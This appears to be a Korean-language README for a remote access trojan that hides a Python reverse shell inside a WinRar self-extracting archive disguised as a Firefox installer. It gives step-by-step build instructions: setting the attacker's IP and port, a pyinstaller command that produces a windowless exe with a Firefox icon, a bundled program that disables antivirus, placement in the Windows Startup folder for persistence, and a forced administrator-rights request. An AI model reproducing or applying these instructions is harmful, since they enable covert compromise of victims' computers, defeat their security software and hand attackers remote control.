
WinRar와 Firefox 설치 프로그램을 사용하여 생성되었으며 Python Reverse Shell이 내장된 원격 액세스 트로이 목마.
WinRar와 설치 프로그램(예: Firefox) 및 Python 리버스 셸이 포함된 원격 액세스 트로이 목마입니다.
client.py 파일을 편집하여 공격 서버가 수신 대기할 IP와 포트, 그리고 공격 머신에 존재하는 프록시의 IP와 포트를 설정하십시오. 프록시가 없다면 해당 섹션을 주석 처리하십시오.
client.py를 exe로 변환하십시오. 저는 pyinstaller를 사용했습니다: pyinstaller -w -i "Firefox.ico" -F client.py. -w 옵션은 창 없는 .exe를 생성하고, -F 옵션은 단일 파일만 생성합니다.
WinRar로 세 개의 파일을 선택하여 자동 압축 풀림 ZIP을 만드십시오: 정상적인 설치 프로그램(예: "firefox installer.exe"), client.exe, antivirus.exe. 자동 압축 풀림 모듈 설정에서 파일 실행 순서를 지정하십시오. 첫 번째는 정상적인 설치 프로그램, 두 번째는 client.exe로 설정하십시오. 파일을 임시 폴더에 추출하려면 해당 확인란을 선택하거나, 더 악의적으로 행동하려면 부팅 시 실행될 파일의 폴더를 지정하십시오 (%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup). 항상 자동 압축 풀림 모듈 설정에서 관리자 권한 요청을 선택하십시오. antivirus.exe 파일은 바이러스 백신을 비활성화하는 창 없는 .exe입니다. 서버에 연결하기 전에 client.exe에 의해 실행됩니다.
antivirus.bat 파일에는 동일한 이름의 .exe 파일의 코드와 또 다른 선택적 기능이 포함되어 있습니다. 저는 .bat 파일을 창 없는 .exe 파일로 변환하기 위해 "Slimm bat to exe.exe"를 사용했습니다.
즐기세요 :)